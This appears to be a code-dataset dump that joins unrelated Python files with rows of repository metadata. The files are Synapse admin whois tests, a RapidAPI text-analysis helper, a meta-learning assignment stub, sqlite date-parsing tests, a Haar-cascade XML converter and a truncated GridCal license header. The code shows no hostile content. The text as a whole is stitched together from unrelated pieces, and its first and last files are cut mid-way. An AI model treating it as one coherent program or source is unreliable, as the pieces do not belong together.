# Logging in as the other user and joining a room should work, even
# though the MAU limit would stop the user doing so.
puppet_token = self._get_token()
self.helper.join(room_id, user=self.other_user, tok=puppet_token)
class WhoisRestTestCase(unittest.HomeserverTestCase):
servlets = [
synapse.rest.admin.register_servlets,
login.register_servlets,
]
def prepare(self, reactor, clock, hs):
self.store = hs.get_datastore()
self.admin_user = self.register_user("admin", "pass", admin=True)
self.admin_user_tok = self.login("admin", "pass")
self.other_user = self.register_user("user", "pass")
self.url1 = "/_synapse/admin/v1/whois/%s" % urllib.parse.quote(self.other_user)
self.url2 = "/_matrix/client/r0/admin/whois/%s" % urllib.parse.quote(
self.other_user
)
def test_no_auth(self):
"""
Try to get information of an user without authentication.
"""
request, channel = self.make_request("GET", self.url1, b"{}")
self.assertEqual(401, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual(Codes.MISSING_TOKEN, channel.json_body["errcode"])
request, channel = self.make_request("GET", self.url2, b"{}")
self.assertEqual(401, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual(Codes.MISSING_TOKEN, channel.json_body["errcode"])
def test_requester_is_not_admin(self):
"""
If the user is not a server admin, an error is returned.
"""
self.register_user("user2", "pass")
other_user2_token = self.login("user2", "pass")
request, channel = self.make_request(
"GET", self.url1, access_token=other_user2_token,
)
self.assertEqual(403, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual(Codes.FORBIDDEN, channel.json_body["errcode"])
request, channel = self.make_request(
"GET", self.url2, access_token=other_user2_token,
)
self.assertEqual(403, int(channel.result["code"]), msg=channel.result["body"])
self.assertEqual(Codes.FORBIDDEN, channel.json_body["errcode"])
def test_user_is_not_local(self):
"""
Tests that a lookup for a user that is not a local returns a 400
"""
url1 = "/_synapse/admin/v1/whois/@unknown_person:unknown_domain"
url2 = "/_matrix/client/r0/admin/whois/@unknown_person:unknown_domain"
request, channel = self.make_request(
"GET", url1, access_token=self.admin_user_tok,
)
self.assertEqual(400, channel.code, msg=channel.json_body)
self.assertEqual("Can only whois a local user", channel.json_body["error"])
request, channel = self.make_request(
"GET", url2, access_token=self.admin_user_tok,
)
self.assertEqual(400, channel.code, msg=channel.json_body)
self.assertEqual("Can only whois a local user", channel.json_body["error"])
def test_get_whois_admin(self):
"""
The lookup should succeed for an admin.
"""
request, channel = self.make_request(
"GET", self.url1, access_token=self.admin_user_tok,
)
self.assertEqual(200, channel.code, msg=channel.json_body)
self.assertEqual(self.other_user, channel.json_body["user_id"])
self.assertIn("devices", channel.json_body)
request, channel = self.make_request(
"GET", self.url2, access_token=self.admin_user_tok,
)
self.assertEqual(200, channel.code, msg=channel.json_body)
self.assertEqual(self.other_user, channel.json_body["user_id"])
self.assertIn("devices", channel.json_body)
def test_get_whois_user(self):
"""
The lookup should succeed for a normal user looking up their own information.
"""
other_user_token = self.login("user", "pass")
request, channel = self.make_request(
"GET", self.url1, access_token=other_user_token,
)
self.assertEqual(200, channel.code, msg=channel.json_body)
self.assertEqual(self.other_user, channel.json_body["user_id"])
self.assertIn("devices", channel.json_body)
request, channel = self.make_request(
"GET", self.url2, access_token=other_user_token,
)
self.assertEqual(200, channel.code, msg=channel.json_body)
self.assertEqual(self.other_user, channel.json_body["user_id"])
self.assertIn("devices", channel.json_body)
| 37.236828 | 88 | 0.610794 | 8,390 | 69,968 | 4.93087 | 0.064124 | 0.094271 | 0.069253 | 0.064346 | 0.82219 | 0.807058 | 0.785448 | 0.763766 | 0.749867 | 0.739425 | 0 | 0.016666 | 0.258189 | 69,968 | 1,878 | 89 | 37.256656 | 0.780398 | 0.117725 | 0 | 0.587436 | 0 | 0 | 0.130032 | 0.026682 | 0 | 0 | 0 | 0 | 0.244482 | 1 | 0.064516 | false | 0.055178 | 0.011885 | 0 | 0.093379 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
0703656c372759d76f6e9d90aa2d026c71e737ab | 1,075 | py | Python | Virtual Assistant/API/testTextHelp.py | Codingmace/JARVIS | 826d8eeaac9472511ffe5cae6f6924aa041cc723 | [
"MIT"
] | 1 | 2021-02-06T13:08:37.000Z | 2021-02-06T13:08:37.000Z | Virtual Assistant/API/testTextHelp.py | Codingmace/JARVIS | 826d8eeaac9472511ffe5cae6f6924aa041cc723 | [
"MIT"
] | null | null | null | Virtual Assistant/API/testTextHelp.py | Codingmace/JARVIS | 826d8eeaac9472511ffe5cae6f6924aa041cc723 | [
"MIT"
] | null | null | null | import requests
from variables import rapidApiKey
def fetchText(url):
baseUrl = "https://test1972.p.rapidapi.com/analyze-text/text"
querystring = {"url":url}
headers = {
'x-rapidapi-key': rapidApiKey,
'x-rapidapi-host': "test1972.p.rapidapi.com"
}
response = requests.request("GET", baseUrl, headers=headers, params=querystring)
return response
def pos(url):
baseUrl = "https://test1972.p.rapidapi.com/analyze-text/pos"
querystring = {"url":url}
headers = {
'x-rapidapi-key': rapidApiKey,
'x-rapidapi-host': "test1972.p.rapidapi.com"
}
response = requests.request("GET", baseUrl, headers=headers, params=querystring)
return response
def namedEntity(url):
baseUrl = "https://test1972.p.rapidapi.com/analyze-text/ner"
querystring = {"url":url}
headers = {
'x-rapidapi-key': rapidApiKey,
'x-rapidapi-host': "test1972.p.rapidapi.com"
}
response = requests.request("GET", baseUrl, headers=headers, params=querystring)
return response
| 24.431818 | 84 | 0.649302 | 120 | 1,075 | 5.816667 | 0.241667 | 0.077364 | 0.146132 | 0.17192 | 0.885387 | 0.885387 | 0.885387 | 0.885387 | 0.885387 | 0.687679 | 0 | 0.028202 | 0.208372 | 1,075 | 43 | 85 | 25 | 0.792009 | 0 | 0 | 0.62069 | 0 | 0 | 0.29702 | 0.064246 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103448 | false | 0 | 0.068966 | 0 | 0.275862 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
07495387115b57ff97fe333ff9177fabf5ea7156 | 5,721 | py | Python | assignment.py | janvanrijn/automl_algorithmselection | f85d47590f63d9fb0dd7332ae1b9d1ccba5cb30e | [
"BSD-3-Clause"
] | 1 | 2020-10-19T12:58:04.000Z | 2020-10-19T12:58:04.000Z | assignment.py | janvanrijn/automl_algorithmselection | f85d47590f63d9fb0dd7332ae1b9d1ccba5cb30e | [
"BSD-3-Clause"
] | null | null | null | assignment.py | janvanrijn/automl_algorithmselection | f85d47590f63d9fb0dd7332ae1b9d1ccba5cb30e | [
"BSD-3-Clause"
] | null | null | null | import pandas as pd
import sklearn.tree
import sklearn.ensemble
import typing
class AbsractMetaLearningModel(object):
def fit(self, df_features: pd.DataFrame, df_performance: pd.DataFrame) -> None:
"""
Takes an input (meta-features) and trains the internal model on it.
:param df_features: pd.DataFrame
a data frame with size (N, M), where all N rows represent a base-dataset, and all M columns represent a
meta-feature, calculated over that specific dataset
:param df_performance: pd.DataFrame
a data frame with size (N, D), where all N rows represent a base-dataset, and all D columns represent the
performance of a (base-)model on that specific dataset (predictive accuracy)
"""
raise NotImplementedError("Abstract Method, please subclass")
def predict(self, df_features: pd.DataFrame) -> typing.List[str]:
"""
Predicts for a set of datasets (expressed in meta-features) the performance per (base-)model
:param df_features: pd.DataFrame
a data frame with size (N, M), where all N rows represent a base-dataset, and all M columns represent a
meta-feature, calculated over that specific dataset
:return: List[str]
A list of length N, where each item in the list represents the name of the (base-)model that is predicted to
perform best
"""
raise NotImplementedError("Abstract Method, please subclass")
def score(self, y: pd.DataFrame, y_hat: typing.List[str]) -> typing.List[str]:
"""
Scores the how well the by the meta-model selected classifiers would have performed.
:param y: pd.DataFrame
a data frame with size (N, D), where all N rows represent a base-dataset, and all D columns represent the
performance of a (base-)model on that specific dataset (predictive accuracy)
:param y_hat: pd.DataFrame
A list of length N, where each item in the list represents the name of the (base-)model that is predicted to
perform best
:return: List[float]
The performance of the by the meta-model selected classifiers (indicated in y_hat) per task
"""
result = []
for idx, classifier in enumerate(y_hat):
result.append(y[classifier][idx])
return result
class MetaLearningBestOnAverage(AbsractMetaLearningModel):
def __init__(self, _):
"""
Baseline method, that determines during fit time which method performs best on average. This method is selected
always at test time.
"""
self.best_model_name = None
def fit(self, df_features: pd.DataFrame, df_performance: pd.DataFrame) -> None:
"""
Takes an input (meta-features) and trains the internal model on it.
:param df_features: pd.DataFrame
a data frame with size (N, M), where all N rows represent a base-dataset, and all M columns represent a
meta-feature, calculated over that specific dataset
:param df_performance: pd.DataFrame
a data frame with size (N, D), where all N rows represent a base-dataset, and all D columns represent the
performance of a (base-)model on that specific dataset (predictive accuracy)
"""
raise NotImplementedError('Please implement')
def predict(self, df_features: pd.DataFrame) -> typing.List[str]:
"""
Predicts for a set of datasets (expressed in meta-features) the performance per (base-)model
:param df_features: pd.DataFrame
a data frame with size (N, M), where all N rows represent a base-dataset, and all M columns represent a
meta-feature, calculated over that specific dataset
:return: List[str]
A list of length N, where each item in the list represents the name of the (base-)model that is predicted to
perform best
"""
raise NotImplementedError('Please implement')
class MetaLearningRegressionBased(AbsractMetaLearningModel):
def __init__(self, expected_models):
"""
Baseline method, that determines during fit time which method performs best on average. This method is selected
always at test time.
"""
self.models = {
model: sklearn.ensemble.RandomForestRegressor(random_state=0) for model in expected_models
}
def fit(self, df_features: pd.DataFrame, df_performance: pd.DataFrame) -> None:
"""
Takes an input (meta-features) and trains the internal model on it.
:param df_features: pd.DataFrame
a data frame with size (N, M), where all N rows represent a base-dataset, and all M columns represent a
meta-feature, calculated over that specific dataset
:param df_performance: pd.DataFrame
a data frame with size (N, D), where all N rows represent a base-dataset, and all D columns represent the
performance of a (base-)model on that specific dataset (predictive accuracy)
"""
raise NotImplementedError('Please implement')
def predict(self, df_features: pd.DataFrame) -> typing.List[str]:
"""
Predicts for a set of datasets (expressed in meta-features) the performance per (base-)model
:param df_features: pd.DataFrame
a data frame with size (N, M), where all N rows represent a base-dataset, and all M columns represent a
meta-feature, calculated over that specific dataset
:return: List[str]
A list of length N, where each item in the list represents the name of the (base-)model that is predicted to
perform best
"""
raise NotImplementedError('Please implement')
| 42.066176 | 119 | 0.674358 | 782 | 5,721 | 4.887468 | 0.15601 | 0.06044 | 0.037677 | 0.065934 | 0.846677 | 0.846677 | 0.846677 | 0.812402 | 0.812402 | 0.812402 | 0 | 0.000235 | 0.254851 | 5,721 | 135 | 120 | 42.377778 | 0.896317 | 0.617025 | 0 | 0.4 | 0 | 0 | 0.079257 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3 | false | 0 | 0.133333 | 0 | 0.566667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
4af2f146bc7fb79728efe83340f78968f771b024 | 2,708 | py | Python | tests/icssqlite-test.py | CraigKelly/datasimple | 1458149f789b7aeb0e2d7886bc9ba5fd5600d700 | [
"Apache-2.0"
] | 1 | 2018-05-29T18:12:13.000Z | 2018-05-29T18:12:13.000Z | tests/icssqlite-test.py | CraigKelly/datasimple | 1458149f789b7aeb0e2d7886bc9ba5fd5600d700 | [
"Apache-2.0"
] | null | null | null | tests/icssqlite-test.py | CraigKelly/datasimple | 1458149f789b7aeb0e2d7886bc9ba5fd5600d700 | [
"Apache-2.0"
] | null | null | null | """Tests for simple sqlite3 wrapper for ICS data."""
from datasimple.sqlite import connect
def connect_test():
db = connect(':memory:')
with db:
db.execute("""create table t (a, b)""")
db.execute("""insert into t (a, b) values (' the part is-ok', '06/22/2017')""")
def v(exp, sql):
act = list(db.execute(sql))[0][0]
if exp != act:
assert exp == act, 'Expected {} but got {}'.format(exp, act)
v('PARTIS0K', """select comppart(a) from t""")
v('2017', """select strftime('%Y', ds_datetime(b)) from t""")
v('06', """select strftime('%m', ds_datetime(b)) from t""")
v('22', """select strftime('%d', ds_datetime(b)) from t""")
v('2017', """select strftime('%Y', ds_datetime('08/22/17'))""")
v('2017', """select strftime('%Y', ds_datetime('08/01/17'))""")
v('2017', """select strftime('%Y', ds_datetime('8/1/17'))""")
v('2017', """select strftime('%Y', ds_datetime('08/1/17'))""")
v('2017', """select strftime('%Y', ds_datetime('8/01/17'))""")
v('2017', """select strftime('%Y', ds_datetime('08/22/2017'))""")
v('2017', """select strftime('%Y', ds_datetime('08/01/2017'))""")
v('2017', """select strftime('%Y', ds_datetime('8/1/2017'))""")
v('2017', """select strftime('%Y', ds_datetime('08/1/2017'))""")
v('2017', """select strftime('%Y', ds_datetime('8/01/2017'))""")
v('08', """select strftime('%m', ds_datetime('08/22/17'))""")
v('08', """select strftime('%m', ds_datetime('08/01/17'))""")
v('08', """select strftime('%m', ds_datetime('8/1/17'))""")
v('08', """select strftime('%m', ds_datetime('08/1/17'))""")
v('08', """select strftime('%m', ds_datetime('8/01/17'))""")
v('08', """select strftime('%m', ds_datetime('08/22/2017'))""")
v('08', """select strftime('%m', ds_datetime('08/01/2017'))""")
v('08', """select strftime('%m', ds_datetime('8/1/2017'))""")
v('08', """select strftime('%m', ds_datetime('08/1/2017'))""")
v('08', """select strftime('%m', ds_datetime('8/01/2017'))""")
v('22', """select strftime('%d', ds_datetime('08/22/17'))""")
v('01', """select strftime('%d', ds_datetime('08/01/17'))""")
v('01', """select strftime('%d', ds_datetime('8/1/17'))""")
v('01', """select strftime('%d', ds_datetime('08/1/17'))""")
v('01', """select strftime('%d', ds_datetime('8/01/17'))""")
v('22', """select strftime('%d', ds_datetime('08/22/2017'))""")
v('01', """select strftime('%d', ds_datetime('08/01/2017'))""")
v('01', """select strftime('%d', ds_datetime('8/1/2017'))""")
v('01', """select strftime('%d', ds_datetime('08/1/2017'))""")
v('01', """select strftime('%d', ds_datetime('8/01/2017'))""")
| 49.236364 | 87 | 0.541359 | 403 | 2,708 | 3.55335 | 0.146402 | 0.322626 | 0.150838 | 0.14595 | 0.805168 | 0.791899 | 0.77095 | 0.751397 | 0.751397 | 0 | 0 | 0.123863 | 0.147341 | 2,708 | 54 | 88 | 50.148148 | 0.496319 | 0.016987 | 0 | 0 | 0 | 0.022727 | 0.659262 | 0.273343 | 0 | 0 | 0 | 0 | 0.022727 | 1 | 0.045455 | false | 0 | 0.022727 | 0 | 0.068182 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
ab26d8848c84b7f20c3e30106caf5a220c25af0f | 14,923 | py | Python | ml/haarcascade/cascade_convert.py | jiskra/openmv | a0f321836f77f94d8118910598dcdb79eb784d58 | [
"MIT"
] | 1,761 | 2015-07-10T23:14:17.000Z | 2022-03-30T07:49:49.000Z | ml/haarcascade/cascade_convert.py | jiskra/openmv | a0f321836f77f94d8118910598dcdb79eb784d58 | [
"MIT"
] | 487 | 2015-07-07T23:21:20.000Z | 2022-03-30T17:13:22.000Z | ml/haarcascade/cascade_convert.py | jiskra/openmv | a0f321836f77f94d8118910598dcdb79eb784d58 | [
"MIT"
] | 882 | 2015-08-01T08:34:19.000Z | 2022-03-30T07:36:23.000Z | #!/usr/bin/env python2
# This file is part of the OpenMV project.
#
# Copyright (c) 2013-2021 Ibrahim Abdelkader <iabdalkader@openmv.io>
# Copyright (c) 2013-2021 Kwabena W. Agyeman <kwagyeman@openmv.io>
#
# This work is licensed under the MIT license, see the file LICENSE for details.
#
# Haar Cascade binary converter.
import sys,os
import struct
import argparse
from xml.dom import minidom
def cascade_info_universal(path):
xmldoc = minidom.parse(path)
old_format = xmldoc.getElementsByTagName('stageNum').length == 0
if old_format:
print("Parsing old XML format..")
cascade_info_old(path)
else:
print("Parsing new XML format..")
cascade_info(path)
def cascade_info(path):
#parse xml file
xmldoc = minidom.parse(path)
n_stages = int(xmldoc.getElementsByTagName('stageNum')[0].childNodes[0].nodeValue)
# read stages
stages_elements = xmldoc.getElementsByTagName('stages')
stages = []
for node in stages_elements[0].childNodes:
if node.nodeType == 1:
stages.append(int(node.getElementsByTagName('maxWeakCount')[0].childNodes[0].nodeValue))
stage_threshold = xmldoc.getElementsByTagName('stageThreshold')[0:n_stages]
# total number of features
n_features = sum(stages)
#read rectangles
feature = xmldoc.getElementsByTagName('rects')[0:n_features]
#read cascade size
size = [int(xmldoc.getElementsByTagName('width')[0].childNodes[0].nodeValue), int(xmldoc.getElementsByTagName('height')[0].childNodes[0].nodeValue)]
n_rectangles = 0
for f in feature:
rects = f.getElementsByTagName('_')
n_rectangles = n_rectangles + len(rects)
#print some cascade info
print("size:%dx%d"%(size[0], size[1]))
print("stages:%d"%len(stages))
print("features:%d"%n_features)
print("rectangles:%d"%n_rectangles)
def cascade_info_old(path):
#parse xml file
xmldoc = minidom.parse(path)
trees = xmldoc.getElementsByTagName('trees')
n_stages = len(trees)
# read stages
stages = [len(t.childNodes)//2 for t in trees][0:n_stages]
stage_threshold = xmldoc.getElementsByTagName('stage_threshold')[0:n_stages]
# total number of features
n_features = sum(stages)
# read features threshold
threshold = xmldoc.getElementsByTagName('threshold')[0:n_features]
#theres one of each per feature
alpha1 = xmldoc.getElementsByTagName('left_val')[0:n_features]
alpha2 = xmldoc.getElementsByTagName('right_val')[0:n_features]
#read rectangles
feature = xmldoc.getElementsByTagName('rects')[0:n_features]
#read cascade size
size = list(map(int, xmldoc.getElementsByTagName('size')[0].childNodes[0].nodeValue.split()))
n_rectangles = 0
for f in feature:
rects = f.getElementsByTagName('_')
n_rectangles = n_rectangles + len(rects)
#print some cascade info
print("size:%dx%d"%(size[0], size[1]))
print("stages:%d"%len(stages))
print("features:%d"%n_features)
print("rectangles:%d"%n_rectangles)
def cascade_binary_universal(path, n_stages, name):
xmldoc = minidom.parse(path)
old_format = xmldoc.getElementsByTagName('stageNum').length == 0
if old_format:
print("Converting old XML format..")
cascade_binary_old(path, n_stages, name)
else:
print("Converting new XML format..")
cascade_binary(path, n_stages, name)
def cascade_binary(path, n_stages, name):
#parse xml file
xmldoc = minidom.parse(path)
max_stages = int(xmldoc.getElementsByTagName('stageNum')[0].childNodes[0].nodeValue)
if n_stages > max_stages:
raise Exception("The max number of stages is: %d"%(max_stages))
if n_stages == 0:
n_stages = max_stages
# read stages
stages_elements = xmldoc.getElementsByTagName('stages')
stages = []
for node in stages_elements[0].childNodes:
if node.nodeType == 1:
stages.append(int(node.getElementsByTagName('maxWeakCount')[0].childNodes[0].nodeValue))
stage_threshold = xmldoc.getElementsByTagName('stageThreshold')[0:n_stages]
# total number of features
n_features = int(sum(stages))
# read features threshold
internal_nodes = xmldoc.getElementsByTagName('internalNodes')[0:n_features]
# theres one of each per feature
leaf_values = xmldoc.getElementsByTagName('leafValues')[0:n_features]
alpha1 = []
alpha2 = []
for val in leaf_values:
alpha1.append(val.childNodes[0].nodeValue.split()[0])
alpha2.append(val.childNodes[0].nodeValue.split()[1])
# read rectangles
feature = xmldoc.getElementsByTagName('rects')[0:n_features]
# read cascade size
size = [int(xmldoc.getElementsByTagName('width')[0].childNodes[0].nodeValue), int(xmldoc.getElementsByTagName('height')[0].childNodes[0].nodeValue)]
# open output file with the specified name or xml file name
if not name:
name = os.path.basename(path).split('.')[0]
fout = open(name+".cascade", "wb")
n_rectangles = 0
for f in feature:
rects = f.getElementsByTagName('_')
n_rectangles = n_rectangles + len(rects)
# write detection window size
fout.write(struct.pack('i', size[0]))
fout.write(struct.pack('i', size[1]))
# write num stages
fout.write(struct.pack('i', len(stages)))
# write num feat in stages
for s in stages:
fout.write(struct.pack('B', s)) # uint8_t
# write stages thresholds
for t in stage_threshold:
fout.write(struct.pack('h', int(float(t.childNodes[0].nodeValue)*256))) #int16_t
# write features threshold 1 per feature
for t in internal_nodes:
fout.write(struct.pack('h', int(float(t.childNodes[0].nodeValue.split()[3])*4096))) #int16_t
# write alpha1 1 per feature
for a in alpha1:
fout.write(struct.pack('h', int(float(a)*256))) #int16_t
# write alpha2 1 per feature
for a in alpha2:
fout.write(struct.pack('h', int(float(a)*256))) #int16_t
# write num_rects per feature
for f in internal_nodes:
idx = int(f.childNodes[0].nodeValue.split()[2])
rects = feature[idx].getElementsByTagName('_')
fout.write(struct.pack('B', len(rects))) # uint8_t
# write rects weights 1 per rectangle
for f in internal_nodes:
idx = int(f.childNodes[0].nodeValue.split()[2])
rects = feature[idx].getElementsByTagName('_')
for r in rects:
l = list(map(int, r.childNodes[0].nodeValue[:-1].split()))
fout.write(struct.pack('b', l[4])) #int8_t NOTE: multiply by 4096
# write rects
for f in internal_nodes:
idx = int(f.childNodes[0].nodeValue.split()[2])
rects = feature[idx].getElementsByTagName('_')
for r in rects:
l = list(map(int, r.childNodes[0].nodeValue[:-1].split()))
fout.write(struct.pack('BBBB', l[0], l[1], l[2], l[3])) #uint8_t
# print cascade info
print("size:%dx%d"%(size[0], size[1]))
print("stages:%d"%len(stages))
print("features:%d"%n_features)
print("rectangles:%d"%n_rectangles)
print("binary cascade generated")
def cascade_binary_old(path, n_stages, name):
#parse xml file
xmldoc = minidom.parse(path)
trees = xmldoc.getElementsByTagName('trees')
max_stages = len(trees)
if n_stages > max_stages:
raise Exception("The max number of stages is: %d"%(max_stages))
if n_stages == 0:
n_stages = max_stages
# read stages
stages = [len(t.childNodes)//2 for t in trees][0:n_stages]
stage_threshold = xmldoc.getElementsByTagName('stage_threshold')[0:n_stages]
# total number of features
n_features = sum(stages)
# read features threshold
threshold = xmldoc.getElementsByTagName('threshold')[0:n_features]
# theres one of each per feature
alpha1 = xmldoc.getElementsByTagName('left_val')[0:n_features]
alpha2 = xmldoc.getElementsByTagName('right_val')[0:n_features]
# read rectangles
feature = xmldoc.getElementsByTagName('rects')[0:n_features]
# read cascade size
size = list(map(int, xmldoc.getElementsByTagName('size')[0].childNodes[0].nodeValue.split()))
# open output file with the specified name or xml file name
if not name:
name = os.path.basename(path).split('.')[0]
fout = open(name+".cascade", "wb")
n_rectangles = 0
for f in feature:
rects = f.getElementsByTagName('_')
n_rectangles = n_rectangles + len(rects)
# write detection window size
fout.write(struct.pack('i', size[0]))
fout.write(struct.pack('i', size[1]))
# write num stages
fout.write(struct.pack('i', len(stages)))
# write num feat in stages
for s in stages:
fout.write(struct.pack('B', s)) # uint8_t
# write stages thresholds
for t in stage_threshold:
fout.write(struct.pack('h', int(float(t.childNodes[0].nodeValue)*256))) #int16_t
# write features threshold 1 per feature
for t in threshold:
fout.write(struct.pack('h', int(float(t.childNodes[0].nodeValue)*4096))) #int16_t
# write alpha1 1 per feature
for a in alpha1:
fout.write(struct.pack('h', int(float(a.childNodes[0].nodeValue)*256))) #int16_t
# write alpha2 1 per feature
for a in alpha2:
fout.write(struct.pack('h', int(float(a.childNodes[0].nodeValue)*256))) #int16_t
# write num_rects per feature
for f in feature:
rects = f.getElementsByTagName('_')
fout.write(struct.pack('B', len(rects))) # uint8_t
# write rects weights 1 per rectangle
for f in feature:
rects = f.getElementsByTagName('_')
for r in rects:
l = list(map(int, r.childNodes[0].nodeValue[:-1].split()))
fout.write(struct.pack('b', l[4])) #int8_t NOTE: multiply by 4096
# write rects
for f in feature:
rects = f.getElementsByTagName('_')
for r in rects:
l = list(map(int, r.childNodes[0].nodeValue[:-1].split()))
fout.write(struct.pack('BBBB',l[0], l[1], l[2], l[3])) #uint8_t
# print cascade info
print("size:%dx%d"%(size[0], size[1]))
print("stages:%d"%len(stages))
print("features:%d"%n_features)
print("rectangles:%d"%n_rectangles)
print("binary cascade generated")
def cascade_header(path, n_stages, name):
#parse xml file
xmldoc = minidom.parse(path)
trees = xmldoc.getElementsByTagName('trees')
max_stages = len(trees)
if n_stages > max_stages:
raise Exception("The max number of stages is: %d"%(max_stages))
if n_stages == 0:
n_stages = max_stages
# read stages
stages = [len(t.childNodes)/2 for t in trees][0:n_stages]
stage_threshold = xmldoc.getElementsByTagName('stage_threshold')[0:n_stages]
# total number of features
n_features = sum(stages)
# read features threshold
threshold = xmldoc.getElementsByTagName('threshold')[0:n_features]
# theres one of each per feature
alpha1 = xmldoc.getElementsByTagName('left_val')[0:n_features]
alpha2 = xmldoc.getElementsByTagName('right_val')[0:n_features]
# read rectangles
feature = xmldoc.getElementsByTagName('rects')[0:n_features]
# read cascade size
size = list(map(int, xmldoc.getElementsByTagName('size')[0].childNodes[0].nodeValue.split()))
# open output file with the specified name or xml file name
if not name:
name = os.path.basename(path).split('.')[0]
fout = open(name+".h", "w")
n_rectangles = 0
for f in feature:
rects = f.getElementsByTagName('_')
n_rectangles = n_rectangles + len(rects)
# write detection window size
fout.write("const int %s_window_w=%d;\n" %( name, size[0]))
fout.write("const int %s_window_h=%d;\n" %(name, size[1]))
# write num stages
fout.write("const int %s_n_stages=%d;\n" %(name, len(stages)))
# write num feat in stages
fout.write("const uint8_t %s_stages_array[]={%s};\n"
%(name, ", ".join(str(x) for x in stages)))
# write stages thresholds
fout.write("const int16_t %s_stages_thresh_array[]={%s};\n"
%(name, ", ".join(str(int(float(t.childNodes[0].nodeValue)*256)) for t in stage_threshold)))
# write features threshold 1 per feature
fout.write("const int16_t %s_tree_thresh_array[]={%s};\n"
%(name, ", ".join(str(int(float(t.childNodes[0].nodeValue)*4096)) for t in threshold)))
# write alpha1 1 per feature
fout.write("const int16_t %s_alpha1_array[]={%s};\n"
%(name, ", ".join(str(int(float(t.childNodes[0].nodeValue)*256)) for t in alpha1)))
# write alpha2 1 per feature
fout.write("const int16_t %s_alpha2_array[]={%s};\n"
%(name, ", ".join(str(int(float(t.childNodes[0].nodeValue)*256)) for t in alpha2)))
# write num_rects per feature
fout.write("const int8_t %s_num_rectangles_array[]={%s};\n"
%(name, ", ".join(str(len(f.getElementsByTagName('_'))) for f in feature)))
# write rects weights 1 per rectangle
rect_weights = lambda rects:", ".join(r.childNodes[0].nodeValue[:-1].split()[4] for r in rects)
fout.write("const int8_t %s_weights_array[]={%s};\n"
%(name, ", ".join(rect_weights(f.getElementsByTagName('_')) for f in feature)))
# write rects
rect = lambda rects:", ".join(", ".join(r.childNodes[0].nodeValue.split()[:-1]) for r in rects)
fout.write("const int8_t %s_rectangles_array[]={%s};\n"
%(name, ", ".join(rect(f.getElementsByTagName('_')) for f in feature)))
# print cascade info
print("size:%dx%d"%(size[0], size[1]))
print("stages:%d"%len(stages))
print("features:%d"%n_features)
print("rectangles:%d"%n_rectangles)
print("C header cascade generated")
def main():
# CMD args parser
parser = argparse.ArgumentParser(description='haar cascade generator')
parser.add_argument("-i", "--info", action = "store_true", help = "print cascade info and exit")
parser.add_argument("-n", "--name", action = "store", help = "set cascade name", default = "")
parser.add_argument("-s", "--stages", action = "store", help = "set the maximum number of stages", type = int, default=0)
parser.add_argument("-c", "--header", action = "store_true", help = "generate a C header")
parser.add_argument("file", action = "store", help = "OpenCV xml cascade file path")
# Parse CMD args
args = parser.parse_args()
if args.info:
# print cascade info and exit
cascade_info_universal(args.file)
return
if args.header:
# generate a C header from the xml cascade
cascade_header(args.file, args.stages, args.name)
return
# generate a binary cascade from the xml cascade
cascade_binary_universal(args.file, args.stages, args.name)
if __name__ == '__main__':
main()
| 34.948478 | 152 | 0.654426 | 2,017 | 14,923 | 4.732276 | 0.094199 | 0.100786 | 0.067051 | 0.043793 | 0.844316 | 0.82043 | 0.774542 | 0.762598 | 0.748979 | 0.721844 | 0 | 0.022162 | 0.204785 | 14,923 | 426 | 153 | 35.030516 | 0.782169 | 0.155264 | 0 | 0.703252 | 0 | 0 | 0.122511 | 0.017993 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03252 | false | 0 | 0.01626 | 0 | 0.056911 | 0.113821 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
db622365bb481f6b79bc796029c1b9a13a0a141e | 8,595 | py | Python | src/tests/test_line_losses.py | mzy2240/GridCal | 0352f0e9ce09a9c037722bf2f2afc0a31ccd2880 | [
"BSD-3-Clause"
] | 284 | 2016-01-31T03:20:44.000Z | 2022-03-17T21:16:52.000Z | src/tests/test_line_losses.py | mzy2240/GridCal | 0352f0e9ce09a9c037722bf2f2afc0a31ccd2880 | [
"BSD-3-Clause"
] | 94 | 2016-01-14T13:37:40.000Z | 2022-03-28T03:13:56.000Z | src/tests/test_line_losses.py | mzy2240/GridCal | 0352f0e9ce09a9c037722bf2f2afc0a31ccd2880 | [
"BSD-3-Clause"
] | 84 | 2016-03-29T10:43:04.000Z | 2022-02-22T16:26:55.000Z | # This file is part of GridCal.
#
# GridCal is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GridCal is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
